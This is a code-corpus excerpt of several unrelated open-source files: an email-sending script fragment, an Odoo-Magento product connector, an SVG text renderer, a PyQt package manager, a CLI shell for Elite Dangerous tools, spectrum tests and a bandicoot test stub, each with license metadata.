print("Not yet")
mailacc=mailaccount()
mailacc.showMailSettings()
if (raw_input("\nEdit mail server settings ? (y/N)")=='y'):
mailacc.editMailSettings()
print("Please enter your credentials")
mailacc.credentials()
print("Testing the settings")
mailacc.log()
if mailacc.connected:
print("\nSuccessfully logged :) \n")
else:
print("Exiting")
pathto=raw_input("Choose your folder")
currentFolder=folder('/home/shaka/Downloads/photos/')
currentFolder.scan()
currentMessage=message()
currentMessage.text=raw_input("enter the email's body text")
currentFolder.generateEmails(mailacc,currentMessage)
main()
| apache-2.0 | -2,709,665,014,651,973,000 | 30.248447 | 152 | 0.667661 | false |
akretion/connector-magento | magentoerpconnect_catalog/product.py | 1 | 15502 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright 2013
# Author: Guewen Baconnier - Camptocamp SA
# Augustin Cisterne-Kaasv - Elico-corp
# David Béal - Akretion
# Chafique Delli - Akretion
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, orm
from openerp.addons.connector.unit.mapper import (mapping,
ExportMapper)
from openerp.addons.magentoerpconnect.unit.delete_synchronizer import (
MagentoDeleteSynchronizer)
from openerp.addons.magentoerpconnect.unit.export_synchronizer import (
MagentoTranslationExporter)
from openerp.addons.magentoerpconnect.backend import magento
from openerp.addons.connector.exception import MappingError
from openerp.addons.magentoerpconnect.unit.export_synchronizer import (
export_record
)
import openerp.addons.magentoerpconnect.consumer as magentoerpconnect
from openerp.addons.connector.event import on_record_write
from openerp.addons.connector.connector import ConnectorUnit
from openerp.tools.translate import _
import logging
_logger = logging.getLogger(__name__)
class MagentoProductProduct(orm.Model):
_inherit = 'magento.product.product'
_columns = {
'active': fields.boolean(
'Active',
help=("When a binding is unactivated, the product is delete from "
"Magento. This allow to remove product from Magento and so "
"to increase the perf on Magento side")),
}
#Automatically create the magento binding for each image
def create(self, cr, uid, vals, context=None):
mag_image_obj = self.pool['magento.product.image']
mag_product_id = super(MagentoProductProduct, self).\
create(cr, uid, vals, context=context)
mag_product = self.browse(cr, uid, mag_product_id, context=context)
if mag_product.backend_id.auto_bind_image:
for image in mag_product.image_ids:
mag_image_obj.create(cr, uid, {
'openerp_id': image.id,
'backend_id': mag_product.backend_id.id,
}, context=context)
return mag_product_id
def write(self, cr, uid, ids, vals, context=None):
if vals.get('active') is True:
binding_ids = self.search(cr, uid, [
('active', '=', False),
], context=context)
if len(binding_ids) > 0:
raise orm.except_orm(
_('User Error'),
                    _('You can not reactivate the following binding ids: %s. '
                      'Please add a new one instead') % binding_ids)
return super(MagentoProductProduct, self).\
write(cr, uid, ids, vals, context=context)
def unlink(self, cr, uid, ids, context=None):
synchronized_binding_ids = self.search(cr, uid, [
('id', 'in', ids),
('magento_id', '!=', False),
], context=context)
if synchronized_binding_ids:
raise orm.except_orm(
_('User Error'),
                _('The binding ids %s can not be removed as '
                  'their magento_id field is not empty.\n'
                  'Please deactivate them instead') % synchronized_binding_ids)
return super(MagentoProductProduct, self).unlink(
cr, uid, ids, context=context)
_defaults = {
'active': True,
}
class ProductProduct(orm.Model):
_inherit = 'product.product'
_columns = {
'magento_inactive_bind_ids': fields.one2many(
'magento.product.product',
'openerp_id',
domain=[('active', '=', False)],
readonly=True,
string='Magento Bindings',),
}
def _prepare_create_magento_auto_binding(self, cr, uid, product,
backend_id, context=None):
return {
'backend_id': backend_id,
'openerp_id': product.id,
'visibility': '4',
'status': '1',
}
def _get_magento_binding(self, cr, uid, product_id, backend_id, context=None):
binding_ids = self.pool['magento.product.product'].search(cr, uid, [
('openerp_id', '=', product_id),
('backend_id', '=', backend_id),
], context=context)
if binding_ids:
return binding_ids[0]
else:
return None
def automatic_binding(self, cr, uid, ids, sale_ok, context=None):
backend_obj = self.pool['magento.backend']
mag_product_obj = self.pool['magento.product.product']
back_ids = backend_obj.search(cr, uid, [], context=context)
products = self.browse(cr, uid, ids, context=context)
for backend in backend_obj.browse(cr, uid, back_ids, context=context):
if backend.auto_bind_product:
for product in products:
binding_id = self._get_magento_binding(
cr, uid, product.id, backend.id, context=context)
if not binding_id and sale_ok:
vals = self._prepare_create_magento_auto_binding(
cr, uid, product, backend.id, context=context)
mag_product_obj.create(cr, uid, vals, context=context)
else:
mag_product_obj.write(cr, uid, binding_id, {
'status': '1' if sale_ok else '2',
}, context=context)
def write(self, cr, uid, ids, vals, context=None):
super(ProductProduct, self).write(cr, uid, ids, vals, context=context)
if vals.get('active', True) is False:
for product in self.browse(cr, uid, ids, context=context):
for bind in product.magento_bind_ids:
bind.write({'active': False})
if 'sale_ok' in vals:
self.automatic_binding(cr, uid, ids, vals['sale_ok'], context=context)
return True
def create(self, cr, uid, vals, context=None):
product_id = super(ProductProduct, self).create(
cr, uid, vals, context=context)
product = self.browse(cr, uid, product_id, context=context)
if product.sale_ok:
self.automatic_binding(cr, uid, [product.id], True, context=context)
return product_id
def _check_uniq_magento_product(self, cr, uid, ids):
cr.execute("""SELECT openerp_id
FROM magento_product_product
WHERE active=True
GROUP BY backend_id, openerp_id
HAVING count(id) > 1""")
result = cr.fetchall()
if result:
raise orm.except_orm(
_('User Error'),
_('You can not have more than one active binding for '
'a product. Here is the list of product ids with a '
'duplicated binding : %s')
% ", ".join([str(x[0]) for x in result]))
return True
_constraints = [(
_check_uniq_magento_product,
'Only one binding can be active',
['backend_id', 'openerp_id', 'active'],
)]
@on_record_write(model_names=[
'magento.product.product',
])
def delay_export(session, model_name, record_id, vals=None):
if vals.get('active', True) == False:
magentoerpconnect.delay_unlink(session, model_name, record_id)
@magento
class ProductProductDeleteSynchronizer(MagentoDeleteSynchronizer):
""" Partner deleter for Magento """
_model_name = ['magento.product.product']
@magento
class ProductProductConfigurableExport(ConnectorUnit):
_model_name = ['magento.product.product']
def _export_configurable_link(self, binding):
""" Export the link for the configurable product"""
return
@magento
class ProductProductExporter(MagentoTranslationExporter):
_model_name = ['magento.product.product']
@property
def mapper(self):
if self._mapper is None:
self._mapper = self.get_connector_unit_for_model(
ProductProductExportMapper)
return self._mapper
def _should_import(self):
"""Product are only edited on OpenERP Side"""
return False
def _create(self, data):
""" Create the Magento record """
# special check on data before export
sku = data.pop('sku')
attr_set_id = data.pop('attrset')
product_type = data.pop('product_type')
self._validate_data(data)
return self.backend_adapter.create(product_type, attr_set_id, sku, data)
def _export_dependencies(self):
""" Export the dependencies for the product"""
#TODO add export of category
attribute_binder = self.get_binder_for_model('magento.product.attribute')
option_binder = self.get_binder_for_model('magento.attribute.option')
record = self.binding_record
for group in record.attribute_group_ids:
for attribute in group.attribute_ids:
attribute_ext_id = attribute_binder.to_backend(
attribute.attribute_id.id, wrap=True)
if attribute_ext_id:
options = []
if attribute.ttype == 'many2one' and record[attribute.name]:
options = [record[attribute.name]]
elif attribute.ttype == 'many2many':
options = record[attribute.name]
for option in options:
if not option_binder.to_backend(option.id, wrap=True):
ctx = self.session.context.copy()
ctx['connector_no_export'] = True
binding_id = self.session.pool['magento.attribute.option'].create(
self.session.cr, self.session.uid, {
'backend_id': self.backend_record.id,
'openerp_id': option.id,
'name': option.name,
}, context=ctx)
export_record(self.session, 'magento.attribute.option', binding_id)
def _after_export(self):
""" Export the link for the configurable product"""
binding = self.binding_record
if binding.is_display:
configurable_exporter = self.environment.get_connector_unit(ProductProductConfigurableExport)
configurable_exporter._export_configurable_link(binding)
@magento
class ProductProductExportMapper(ExportMapper):
_model_name = 'magento.product.product'
#TODO FIXME
# direct = [('name', 'name'),
# ('description', 'description'),
# ('weight', 'weight'),
# ('list_price', 'price'),
# ('description_sale', 'short_description'),
# ('default_code', 'sku'),
# ('product_type', 'type'),
# ('created_at', 'created_at'),
# ('updated_at', 'updated_at'),
# ('status', 'status'),
# ('visibility', 'visibility'),
# ('product_type', 'product_type')
# ]
@mapping
def all(self, record):
return {'name': record.name,
'description': record.description,
'weight': record.weight,
'price': record.lst_price,
'short_description': record.description_sale,
'type': record.product_type,
'created_at': record.created_at,
#'updated_at': record.updated_at,
'status': record.status,
'visibility': record.visibility,
'product_type': record.product_type }
@mapping
def sku(self, record):
sku = record.default_code
if not sku:
raise MappingError("The product attribute default code cannot be empty.")
return {'sku': sku}
@mapping
def set(self, record):
binder = self.get_binder_for_model('magento.attribute.set')
set_id = binder.to_backend(record.attribute_set_id.id, wrap=True)
return {'attrset': set_id}
@mapping
def updated_at(self, record):
updated_at = record.updated_at
if not updated_at:
updated_at = '1970-01-01'
return {'updated_at': updated_at}
@mapping
def website_ids(self, record):
website_ids = []
for website_id in record.website_ids:
magento_id = website_id.magento_id
website_ids.append(magento_id)
return {'website_ids': website_ids}
@mapping
def category(self, record):
categ_ids = []
if record.categ_id:
for m_categ in record.categ_id.magento_bind_ids:
if m_categ.backend_id.id == self.backend_record.id:
categ_ids.append(m_categ.magento_id)
for categ in record.categ_ids:
for m_categ in categ.magento_bind_ids:
if m_categ.backend_id.id == self.backend_record.id:
categ_ids.append(m_categ.magento_id)
return {'categories': categ_ids}
@mapping
def get_product_attribute_option(self, record):
result = {}
option_binder = self.get_binder_for_model('magento.attribute.option')
for group in record.attribute_group_ids:
for attribute in group.attribute_ids:
magento_attribute = None
#TODO maybe adding a get_bind function can be better
for bind in attribute.magento_bind_ids:
if bind.backend_id.id == self.backend_record.id:
magento_attribute = bind
if not magento_attribute:
continue
if attribute.ttype == 'many2one':
option = record[attribute.name]
if option:
result[magento_attribute.attribute_code] = \
option_binder.to_backend(option.id, wrap=True)
else:
result[magento_attribute.attribute_code] = False
elif attribute.ttype == 'many2many':
options = record[attribute.name]
if options:
result[magento_attribute.attribute_code] = \
[option_binder.to_backend(option.id, wrap=True) for option in options]
else:
result[magento_attribute.attribute_code] = False
else:
#TODO add support of lang
result[magento_attribute.attribute_code] = record[attribute.name]
return result
| agpl-3.0 | -2,681,854,512,350,137,300 | 39.685039 | 105 | 0.562802 | false |
CWBudde/Ink2SmartCanvas | Ink2SmartCanvas/svg/Text.py | 1 | 1318 | from ink2canvas.svg.AbstractShape import AbstractShape
class Text(AbstractShape):
def textHelper(self, tspan):
val = ""
if tspan.text:
val += tspan.text
for ts in tspan:
val += self.textHelper(ts)
if tspan.tail:
val += tspan.tail
return val
def setTextStyle(self, style):
keys = ("font-style", "font-weight", "font-size", "font-family")
text = []
for key in keys:
if key in style:
text.append(style[key])
self.canvasContext.setFont(" ".join(text))
def getData(self):
x = self.attr("x")
y = self.attr("y")
return x, y
def draw(self, isClip=False):
x, y = self.getData()
style = self.getStyle()
if self.hasTransform():
transMatrix = self.getTransform()
self.canvasContext.transform(*transMatrix) # unpacks argument list
self.setStyle(style)
self.setTextStyle(style)
for tspan in self.node:
text = self.textHelper(tspan)
_x = float(tspan.get("x"))
_y = float(tspan.get("y"))
self.canvasContext.fillText(text, _x, _y)
self.gradientHelper.setGradientFill()
self.gradientHelper.setGradientStroke()
| gpl-2.0 | -2,483,348,612,490,102,300 | 29.651163 | 78 | 0.552352 | false |
PisiLinux-PyQt5Port/package-manager | src/statemanager.py | 1 | 10398 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2009-2010, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
from PyQt5.QtCore import QObject
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QMessageBox
import config
if config.USE_APPINFO:
from appinfo.client import AppInfoClient
import backend
from pmutils import *
from pmlogging import logger
class StateManager(QObject):
(ALL, INSTALL, REMOVE, UPGRADE, HISTORY) = range(5)
def __init__(self, parent=None):
QObject.__init__(self)
self.state = self.ALL
self._group_cache = {}
self.iface = backend.pm.Iface()
self.reset()
def reset(self):
self.cached_packages = None
self._typeCaches = {}
self._typeFilter = 'normal'
self.initializePackageLists()
def initializePackageLists(self):
self.__groups = self.iface.getGroups()
self.__installed_packages = self.iface.getInstalledPackages()
self.__new_packages = self.iface.getNewPackages()
self.__all_packages = self.__installed_packages + self.__new_packages
repositoriesChanged = pyqtSignal()
def setState(self, state):
self.state = state
self.reset()
self.repositoriesChanged.emit()
def getState(self):
return self.state
def packages(self):
if self.cached_packages == None:
if self.state == self.UPGRADE:
self.cached_packages = self.iface.getUpdates()
self._typeCaches = {}
else:
if self.state == self.REMOVE:
self.cached_packages = self.__installed_packages
elif self.state == self.INSTALL:
self.cached_packages = self.__new_packages
else:
self.cached_packages = self.__all_packages
if self.onlyGuiInState():
self.cached_packages = set(self.cached_packages).intersection(self.iface.getIsaPackages("app:gui"))
if not self._typeFilter == 'normal' and self.state == self.UPGRADE:
if not self._typeCaches.has_key(self._typeFilter):
self._typeCaches[self._typeFilter] = self.iface.filterUpdates(self.cached_packages, self._typeFilter)
return self._typeCaches[self._typeFilter]
return list(self.cached_packages)
def onlyGuiInState(self):
return config.PMConfig().showOnlyGuiApp()
def setCachedPackages(self, packages):
self.cached_packages = packages
def getActionCurrent(self, action):
return {"System.Manager.installPackage":self.tr("Installing Package(s)"),
"System.Manager.reinstallPackage":self.tr("Installing Package(s)"),
"System.Manager.removePackage":self.tr("Removing Package(s)"),
"System.Manager.updatePackage":self.tr("Upgrading Package(s)"),
"System.Manager.setRepositories":self.tr("Applying Repository Changes"),
"System.Manager.updateRepository":self.tr("Updating Repository"),
"System.Manager.updateAllRepositories":self.tr("Updating Repository(s)")}[str(action)]
def toBe(self):
return {self.INSTALL:self.tr("installed"),
self.REMOVE :self.tr("removed"),
self.UPGRADE:self.tr("upgraded"),
self.ALL :self.tr("modified")}[self.state]
def getActionName(self, state = None):
state = self.state if state == None else state
return {self.INSTALL:self.tr("Install Package(s)"),
self.REMOVE :self.tr("Remove Package(s)"),
self.UPGRADE:self.tr("Upgrade Package(s)"),
self.ALL :self.tr("Select Operation")}[state]
def getActionIcon(self, state = None):
state = self.state if state == None else state
return {self.INSTALL:KIcon(("list-add", "add")),
self.REMOVE :KIcon(("list-remove", "remove")),
self.UPGRADE:KIcon(("system-software-update", "gear")),
self.ALL :KIcon("preferences-other")}[state]
def getSummaryInfo(self, total):
        return {self.INSTALL:self.tr("%1 new package(s) have been installed successfully.", total),
                self.REMOVE :self.tr("%1 package(s) have been removed successfully.", total),
                self.UPGRADE:self.tr("%1 package(s) have been upgraded successfully.", total),
                self.ALL    :self.tr("%1 package(s) have been modified successfully.", total)}[self.state]
def getBasketInfo(self):
return {self.INSTALL:self.tr("You have selected the following package(s) to install:"),
                self.REMOVE :self.tr("You have selected the following package(s) to remove:"),
self.UPGRADE:self.tr("You have selected the following package(s) to upgrade:"),
self.ALL :self.tr("You have selected the following package(s) to modify:")}[self.state]
def getBasketExtrasInfo(self):
return {self.INSTALL:self.tr("Extra dependencies of the selected package(s) that are also going to be installed:"),
self.REMOVE :self.tr("Reverse dependencies of the selected package(s) that are also going to be removed:"),
self.UPGRADE:self.tr("Extra dependencies of the selected package(s) that are also going to be upgraded:"),
self.ALL :self.tr("Extra dependencies of the selected package(s) that are also going to be modified:")}[self.state]
def groups(self):
return self.__groups
def groupPackages(self, name):
if name == "all":
return self.packages()
else:
if self._group_cache.has_key(name):
group_packages = self._group_cache[name]
else:
group_packages = self.iface.getGroupPackages(name)
self._group_cache[name] = group_packages
return list(set(self.packages()).intersection(group_packages))
def chainAction(self, operation):
chains = { "System.Manager.setRepositories":lambda:self.repositoriesChanged.emit() }
if chains.has_key(operation):
chains[operation]()
def updateRepoAction(self, silence = False):
if not self.iface.updateRepositories():
if not silence:
self.showFailMessage()
return False
if config.USE_APPINFO:
if network_available():
if not AppInfoClient().checkOutDB()[0]:
AppInfoClient().setServer('http://appinfo.pisilinux.org')
AppInfoClient().checkOutDB()
return True
def statusText(self, packages, packagesSize, extraPackages, extraPackagesSize):
if not packages:
return ''
text = self.tr("Currently there are <b>%1</b> selected package(s) of total <b>%2</b> of size ", packages, packagesSize)
if extraPackages:
if self.state == self.REMOVE:
text += self.tr("with <b>%1</b> reverse dependencies of total <b>%2</b> of size ", extraPackages, extraPackagesSize)
else:
text += self.tr("with <b>%1</b> extra dependencies of total <b>%2</b> of size ", extraPackages, extraPackagesSize)
text += self.tr("in your basket.")
return text
def operationAction(self, packages, silence = False, reinstall = False, connection_required = True):
if connection_required:
if not network_available() and not self.state == self.REMOVE:
if not repos_available(self.iface):
self.showFailMessage()
return False
if not silence and not self.state == self.REMOVE:
if not self.conflictCheckPasses(packages):
return False
if reinstall:
return self.iface.reinstallPackages(packages)
return {self.ALL :self.iface.modifyPackages,
self.INSTALL:self.iface.installPackages,
self.REMOVE :self.iface.removePackages,
self.UPGRADE:self.iface.upgradePackages}[self.state](packages)
def setActionHandler(self, handler):
self.iface.setHandler(handler)
def setExceptionHandler(self, handler):
self.iface.setExceptionHandler(handler)
def conflictCheckPasses(self, packages):
(C, D, pkg_conflicts) = self.iface.getConflicts(packages, self.state)
conflicts_within = list(D)
if conflicts_within:
text = self.tr("Selected packages [%1] are in conflict with each other. These packages can not be installed together.", ", ".join(conflicts_within))
QMessageBox.critical(None, self.tr("Conflict Error"), text, QMessageBox.Ok)
return False
if pkg_conflicts:
text = self.tr("The following packages conflicts:\n")
for pkg in pkg_conflicts.keys():
text += self.tr("%1 conflicts with: [%2]\n", pkg, ", ".join(pkg_conflicts[pkg]))
text += self.tr("\nRemove the conflicting packages from the system?")
return QMessageBox.warning(None, self.tr("Conflict Error"), text, QMessageBox.Yes, QMessageBox.No) == QMessageBox.Yes
return True
def checkUpdateActions(self, packages):
return self.iface.checkUpdateActions(packages)
def checkInstallActions(self, packages):
return filter(lambda x: x in self.__installed_packages, packages)
def checkRemoveActions(self, packages):
important_packages = open(config.DATA_DIR + 'important_packages').read().split('\n')
return list(set(important_packages).intersection(packages))
def inInstall(self):
return self.state == self.INSTALL
def inRemove(self):
return self.state == self.REMOVE
def inUpgrade(self):
return self.state == self.UPGRADE
def showFailMessage(self):
QMessageBox.critical(None,
self.tr("Network Error"),
self.tr("Please check your network connections and try again."),
QMessageBox.Ok)
| gpl-2.0 | 1,623,643,069,164,010,200 | 40.592 | 160 | 0.6181 | false |
rrah/PyLiteCo | __main__.py | 1 | 1670 | """Main launcher for pyliteco.
Author: Robert Walker <[email protected]>
Copyright (C) 2015 Robert Walker
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; version 2.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
import logging
import pyliteco.watchdog
import pyliteco.version
import sys
if __name__ == '__main__':
formatter_string = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
formatter = logging.Formatter(formatter_string)
logging.basicConfig(filename = 'pyliteco.log', format = formatter_string)
root = logging.getLogger()
root.setLevel(logging.NOTSET)
ch = logging.StreamHandler(sys.stdout)
ch.setFormatter(formatter)
root.addHandler(ch)
logger = logging.getLogger(__name__)
logger.info('Starting up as app. v{}'.format(pyliteco.version.VERSION))
import argparse
parser = argparse.ArgumentParser("Start the pyliteco program")
parser.add_argument('-c', dest = 'config_file_entered', default = None, metavar = 'Config file')
thread = pyliteco.watchdog.Watchdog_Thread(**vars(parser.parse_args()))
thread.start() | gpl-2.0 | -2,271,374,031,831,028,500 | 35.326087 | 100 | 0.711976 | false |
KayJohnston/jackies-map | edi.py | 1 | 4447 | #!/usr/bin/env python
from __future__ import print_function
import sys
import shlex
import logging
import time
import cmd
import argparse
import traceback
if __name__ == '__main__':
print("Loading environment...")
import env
log = logging.getLogger("edi")
# Now env is loaded, import the apps
import ship
import edts
import close_to
import coords
import distance
import find
import galmath
import fuel_usage
class EDI(cmd.Cmd):
def __init__(self):
# super (EDI, self).__init__()
cmd.Cmd.__init__(self)
self.prompt = "EDI> "
self.state = {}
def run_application(self, ns, args):
try:
args = shlex.split(args)
app = ns.Application(args, True, self.state)
app.run()
except KeyboardInterrupt:
log.debug("Interrupt detected")
pass
except SystemExit:
pass
except Exception as e:
log.error("Error in application: {}".format(e))
log.debug(traceback.format_exc())
pass
return True
def run_help(self, ns):
try:
ns.Application(['-h'], True, self.state).run()
except SystemExit:
pass
return True
#
# Begin commands
#
def help_edts(self):
return self.run_help(edts)
def do_edts(self, args):
return self.run_application(edts, args)
def help_distance(self):
return self.run_help(distance)
def do_distance(self, args):
return self.run_application(distance, args)
def help_raikogram(self):
return self.help_distance()
def do_raikogram(self, args):
return self.do_distance(args)
def help_close_to(self):
return self.run_help(close_to)
def do_close_to(self, args):
return self.run_application(close_to, args)
def help_coords(self):
return self.run_help(coords)
def do_coords(self, args):
return self.run_application(coords, args)
def help_find(self):
return self.run_help(find)
def do_find(self, args):
return self.run_application(find, args)
def help_galmath(self):
return self.run_help(galmath)
def do_galmath(self, args):
return self.run_application(galmath, args)
def help_fuel_usage(self):
return self.run_help(fuel_usage)
def do_fuel_usage(self, args):
return self.run_application(fuel_usage, args)
def help_set_verbosity(self):
print("usage: set_verbosity N")
print("")
print("Set log level (0-3)")
return True
def do_set_verbosity(self, args):
env.set_verbosity(int(args))
return True
def help_set_ship(self):
print("usage: set_ship -m N -t N -f NC [-c N]")
print("")
print("Set the current ship to be used in other commands")
return True
def do_set_ship(self, args):
ap = argparse.ArgumentParser(fromfile_prefix_chars="@", prog = "set_ship")
ap.add_argument("-f", "--fsd", type=str, required=True, help="The ship's frame shift drive in the form 'A6 or '6A'")
ap.add_argument("-m", "--mass", type=float, required=True, help="The ship's unladen mass excluding fuel")
ap.add_argument("-t", "--tank", type=float, required=True, help="The ship's fuel tank size")
ap.add_argument("-c", "--cargo", type=int, default=0, help="The ship's cargo capacity")
try:
argobj = ap.parse_args(shlex.split(args))
except SystemExit:
return True
s = ship.Ship(argobj.fsd, argobj.mass, argobj.tank, argobj.cargo)
self.state['ship'] = s
print("")
print("Ship [FSD: {0}, mass: {1:.1f}T, fuel: {2:.0f}T]: jump range {3:.2f}Ly ({4:.2f}Ly)".format(s.fsd.drive, s.mass, s.tank_size, s.range(), s.max_range()))
print("")
return True
def help_quit(self):
print("Exit this shell by typing \"exit\", \"quit\" or Control-D.")
return True
def do_quit(self, args):
return False
def help_exit(self):
return self.help_quit()
def do_exit(self, args):
return False
#
# End commands
#
def do_EOF(self, args):
print()
return False
def precmd(self, line):
self.start_time = time.time()
return line
def postcmd(self, retval, line):
if retval is False:
return True
log.debug("Command complete, time taken: {0:.4f}s".format(time.time() - self.start_time))
# Prevent EOF showing up in the list of commands
def print_topics(self, header, cmds, cmdlen, maxcol):
if cmds:
cmds = [c for c in cmds if c != "EOF"]
cmd.Cmd.print_topics(self, header, cmds, cmdlen, maxcol)
if __name__ == '__main__':
env.start()
EDI().cmdloop()
env.stop()
| bsd-3-clause | -2,765,339,657,584,099,000 | 22.908602 | 161 | 0.641106 | false |
cokelaer/spectrum | test/test_correlog.py | 1 | 1904 | from spectrum import CORRELOGRAMPSD, CORRELATION, pcorrelogram, marple_data, cshift
from spectrum import data_two_freqs
from pylab import log10, plot, savefig, linspace
from numpy.testing import assert_array_almost_equal, assert_almost_equal
def test_correlog():
psd = CORRELOGRAMPSD(marple_data, marple_data, lag=15)
assert_almost_equal(psd[0], 0.138216970)
assert_almost_equal(psd[1000-1], 7.900110787)
assert_almost_equal(psd[2000-1], 0.110103858)
assert_almost_equal(psd[3000-1], 0.222184134)
assert_almost_equal(psd[4000-1], -0.036255277)
assert_almost_equal(psd[4096-1], 0.1391839711)
return psd
def test_correlog_auto_cross():
"""Same as test_correlog but x and y provided"""
psd1 = CORRELOGRAMPSD(marple_data, lag=16)
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16)
assert_array_almost_equal(psd1, psd2)
psd1 = CORRELOGRAMPSD(marple_data, lag=16, correlation_method='CORRELATION')
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16, correlation_method='CORRELATION')
assert_array_almost_equal(psd1, psd2)
def test_correlog_correlation_method():
"""test correlogramPSD playing with method argument"""
psd1 = CORRELOGRAMPSD(marple_data, lag=16, correlation_method='CORRELATION')
psd2 = CORRELOGRAMPSD(marple_data, marple_data, lag=16, correlation_method='xcorr')
assert_array_almost_equal(psd1, psd2)
def test_pcorrelogram_class():
p = pcorrelogram(marple_data, lag=16)
p()
print(p)
p = pcorrelogram(data_two_freqs(), lag=16)
p.plot()
print(p)
def test_CORRELOGRAMPSD_others():
p = CORRELOGRAMPSD(marple_data, marple_data, lag=16, NFFT=None)
def create_figure():
psd = test_correlog()
f = linspace(-0.5, 0.5, len(psd))
psd = cshift(psd, len(psd)/2)
plot(f, 10*log10(psd/max(psd)))
savefig('psd_corr.png')
if __name__ == "__main__":
create_figure()
| bsd-3-clause | -7,416,000,210,789,189,000 | 33.618182 | 93 | 0.697479 | false |
pklaus/PyOscilloskop | gui/rigolUi.py | 1 | 3717 | #!/usr/bin/python
# -*- encoding: UTF8 -*-
# pyOscilloskop
#
# Copyright (19.2.2011) Sascha Brinkmann
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
import os
from pyoscilloskop import rigolScope
from pyoscilloskop import RigolError
class RigolUI(object):
def __init__(self):
self.builder = gtk.Builder()
self.builder.add_from_file("oscilloskopControl.glade")
self.builder.connect_signals(self)
self.win = self.builder.get_object('window1')
def showOscilloskopInformations(self):
scope = self.scope
builder = self.builder
builder.get_object("labelConnectedToDevice").set_text(scope.getName() + " (" + scope.getDevice() + ")")
builder.get_object("checkChannel1Showchannel").set_active(scope.getChannel1().isChannelActive())
builder.get_object("textChannel1Voltage").set_text(str(scope.getChannel1().getVoltageScale()) + " V/DIV")
builder.get_object("textChannel1Offset").set_text(str(scope.getChannel1().getVoltageOffset()) + " V")
builder.get_object("checkChannel2Showchannel").set_active(scope.getChannel2().isChannelActive())
builder.get_object("textChannel2Voltage").set_text(str(scope.getChannel2().getVoltageScale()) + " V/DIV")
builder.get_object("textChannel2Offset").set_text(str(scope.getChannel2().getVoltageOffset()) + " V")
builder.get_object("textTimeAxisScale").set_text(str(scope.getTimeScale()) + "S/DIV")
builder.get_object("textTimeAxisOffset").set_text(str(scope.getTimescaleOffset()) + " S")
scope.reactivateControlButtons()
def run(self):
try:
self.scope = rigolScope.RigolScope('/dev/ttyUSB0')
## To get more debug output, do:
self.scope.debugLevel = 5
            self.win.set_title("Oscilloscope remote control")
self.figureCounter = 1
self.showOscilloskopInformations()
except RigolError as e:
self.info_msg("You have to turn on your scope and connect it to the computer.\n\n%s" % e, gtk.MESSAGE_ERROR)
self.quit()
try:
gtk.main()
except KeyboardInterrupt:
pass
def quit(self):
gtk.main_quit()
def on_window1_delete_event(self, *args):
self.quit()
def info_msg(self, msg, messageType=gtk.MESSAGE_INFO):
dlg = gtk.MessageDialog(parent=self.win, type=messageType, buttons=gtk.BUTTONS_OK, message_format=msg)
dlg.run()
dlg.destroy()
def on_buttonShow_clicked(self, *args):
self.plotFigure()
def plotFigure(self):
print("Plot figure")
parameter = " -p"
if(self.builder.get_object("checkRestartAfterAquring").get_active()):
parameter += " -r"
if(not(self.builder.get_object("checkChannel1Showchannel").get_active())):
parameter += " -1"
if(not(self.builder.get_object("checkChannel2Showchannel").get_active())):
parameter += " -2"
os.system("rigolCli.py " + parameter)
if __name__ == '__main__':
rigolUiApp = RigolUI()
rigolUiApp.run()
| gpl-3.0 | -7,523,303,664,822,341,000 | 36.545455 | 120 | 0.658596 | false |
yvesalexandre/bandicoot | bandicoot/tests/test_parsers.py | 1 | 5328 | # The MIT License (MIT)
#
# Copyright (c) 2015-2016 Massachusetts Institute of Technology.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Test the import of CSV files.
"""
import bandicoot as bc
from bandicoot.core import Record, Position
from datetime import datetime as dt
import unittest
import os
class TestParsers(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._dir_changed = False
